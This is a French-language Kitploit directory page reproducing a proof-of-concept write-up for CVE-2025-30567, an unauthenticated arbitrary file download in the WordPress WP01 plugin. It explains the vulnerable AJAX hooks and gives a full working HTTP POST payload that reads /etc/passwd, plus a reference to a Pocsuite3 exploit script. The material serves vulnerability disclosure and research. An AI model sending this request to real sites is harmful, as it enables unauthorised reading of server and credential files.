Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30567 — Téléchargement non autorisé de fichier arbitraire dans WordPress WP01 | Kitploit
Outils/GitHubGitHub/oyst3r1ng/cve-2025-30567
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHuboyst3r1ng/cve-2025-30567

CVE-2025-30567

Téléchargement non autorisé de fichier arbitraire dans WordPress WP01

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Introduction

Téléchargement arbitraire non autorisé de fichier dans WordPress WP01 !

Configuration de l'environnement

Étape 1 : Télécharger le plugin WP01, mais...

alt text

Haha, ne vous inquiétez pas, voici le code source du plugin.

Étape 2 : Compressez le dossier wp01 fourni et téléchargez-le dans la section des plugins WordPress. Comme ceci -->

alt text

Analyse

C'est simple—la vulnérabilité est déclenchée au point suivant :

alt text

Ensuite, vérifions où la méthode make_archive est appelée.

alt text

Deux hooks d'action AJAX sont présents—un pour les utilisateurs connectés et un autre pour les utilisateurs non connectés. C'est la raison de la vulnérabilité d'accès non autorisé.

Très bien, maintenant construisons la charge utile pour lire le contenu de /etc/passwd sur la machine locale.

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

target=passwd&path=/etc/

résultats :

alt text

alt text

OK, ensuite, téléchargez ce fichier wp-01-passwd.zip.

alt text

Poc

Écrit sur la base de Pocsuite3, voir Poc_CVE-2025-30567.py pour les détails.

alt text

Référence

CVE-2025-30567

Télécharger l’outil